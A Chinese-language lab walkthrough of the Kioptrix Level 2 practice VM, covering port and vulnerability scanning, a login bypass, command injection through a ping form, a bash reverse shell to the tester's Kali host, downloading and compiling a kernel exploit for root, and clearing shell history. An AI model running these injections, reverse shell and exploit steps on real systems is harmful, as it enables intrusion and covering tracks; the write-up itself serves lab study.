#渗透测试 kioptix level 2靶机通关教程及提权

H轨迹H2024-12-24 13:38

声明!

文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!

工具链接:https://pan.quark.cn/s/530656ba5503

一、准备阶段

复现请将靶机ip换成自己的

kali: 192.168.108.130

靶机:192.168.108.136

1. 找出ip端口和服务信息

扫出ip

复制代码 
nmap -sn 192.168.108.0/24

扫出端口

复制代码 
nmap -p 1-65535 192.168.108.136

一般扫描出端口后,尝试去访问web页面,但是只有一个登录界面

端口对应服务信息

复制代码 
nmap -sV 192.168.108.136

服务信息

复制代码 
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
3306/tcp open  mysql    MySQL (unauthorized)

可利用信息

OpenSSH 3.9p1

Apache httpd 2.0.52

MySQL (unauthorized)

CUPS 1.1

2. 目录扫描

复制代码 
dirb http://192.168.108.136/

可以看到扫出很多目录,但都是在**http://192.168.108.136/manual** 这个大目录下

访问此目录**http://192.168.108.136/manual**,寻找可能利用的信息

3. 漏洞扫描

nmap扫描漏洞

复制代码 
nmap 192.168.108.136 -p 22,80,111,443,631,3306 -oA --script=vuln

会有很多漏洞

searchsploit查找漏洞

复制代码 
searchsploit Apache httpd 2.0.52
searchsploit OpenSSH 3.9p1
searchsploit MySQL (unauthorized)
searchsploit CUPS 1.1

二、获取权限

1. 访问web服务

结合开放的mysql3306 端口,可以尝试sql注入攻击,

输入万能密码尝试

出现以下界面

可以看到是要进行ping命令,但是没有ping的框架,

查看源代码发现以下信息

发现登录框被闭合了

方法1

打开burpsuite抓包,在拦截设置,选择拦截响应包

点击此处,然后关闭拦截即可

删除' 然后放包

此时就可以进行ping了

方法2

找到需要插入的地方,右键编辑html 将代码复制到这里,并将align='center> 修改align="center">

可以看到也是可以的

2. ping命令

在ping之前先了解一下url中的的一些符号

复制代码 
;     前面的执行完执行后面的
|     管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)         
||    当前面的执行出错时(为假)执行后面的
&     将任务置于后台执行
&&    前面的语句为假则直接出错,后面的也不执行,前面只能为真
%0a  (换行)
%0d  (回车)

ping靶机

输入以下命令

复制代码 
192.168.108.136;ls

发现成功回显,并且经过测试,并不存在过滤的情况

3. 反弹shell

这里我们使用bash反弹

开启监听端口,端口选用kali空闲端口即可

复制代码 
nc -lvvp 4444

执行以下代码

复制代码 
127.0.0.1;bash -i >& /dev/tcp/192.168.108.130/4444 0>&1
/dev/tcp/你的kali的ip/开启的端口

可以看到反弹成功

三、提权

查询版本信息

复制代码 
uname -a
lsb_release -a

信息如下

复制代码 
Linux kioptrix.level2 2.6.9-55.EL
Distributor ID: CentOS
Description:    CentOS release 4.5 (Final)
Release:        4.5

可以知道是centos4.5版本,查找该版本漏洞

找到漏洞利用脚本

利用searchsploit命令下载脚本,这里可以看我之前总结的命令使用详情
searchsploit命令大全

复制代码 
searchsploit centos 4.5 -m 9542.c

下载成功

开启web服务

复制代码 
sudo python -m http.server 80

成功上传

在目标主机上下载脚本

复制代码 
cd /tmp
wget http://192.168.108.130:80/9542.c

下载成功

编译脚本

复制代码 
gcc 9542.c
chamod 777 a.out
./a.out

提权成功

可以看到是有命令记录的,为了更严谨,最后每次复现完,退出的时候清除历史命令

复制代码 
history -c
相关推荐
网安INF2 小时前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
lubiii_2 小时前
墨者学院-密码学实训隐写术第二题
web安全·网络安全·密码学
李枫月4 小时前
Server2003 B-1 Windows操作系统渗透
网络安全·环境解析·server2003
饮长安千年月7 小时前
JavaSec-SpringBoot框架
java·spring boot·后端·计算机网络·安全·web安全·网络安全
恰薯条的屑海鸥9 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第九期-Unsafe Fileupload模块)(yakit方式)
网络·学习·安全·web安全·渗透测试·csrf·网络安全学习
Bruce_Liuxiaowei11 小时前
PHP文件包含漏洞详解:原理、利用与防御
开发语言·网络安全·php·文件包含
2501_9151063212 小时前
Flutter、React Native 项目如何搞定 iOS 上架?从构建 IPA 到上传 App Store 的实战流程全解析
websocket·网络协议·tcp/ip·http·网络安全·https·udp
网安INF12 小时前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)
java·web安全·网络安全·kafka·漏洞·jndi注入
恰薯条的屑海鸥13 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十期-Over Permission 模块)
学习·安全·web安全·渗透测试·网络安全学习
Bruce_Liuxiaowei15 小时前
深入理解PHP安全漏洞:文件包含与SSRF攻击全解析
开发语言·网络安全·php
热门推荐
01【图像处理与机器视觉】XJTU期末考点02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04海康Visionmaster-常见问题排查方法-启动阶段05从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07Coze扣子平台完整体验和实践(附国内和国际版对比)08DeepSeek各版本说明与优缺点分析09VMware虚拟机安装Win7专业版保姆级教程(附镜像包)10R-tree详解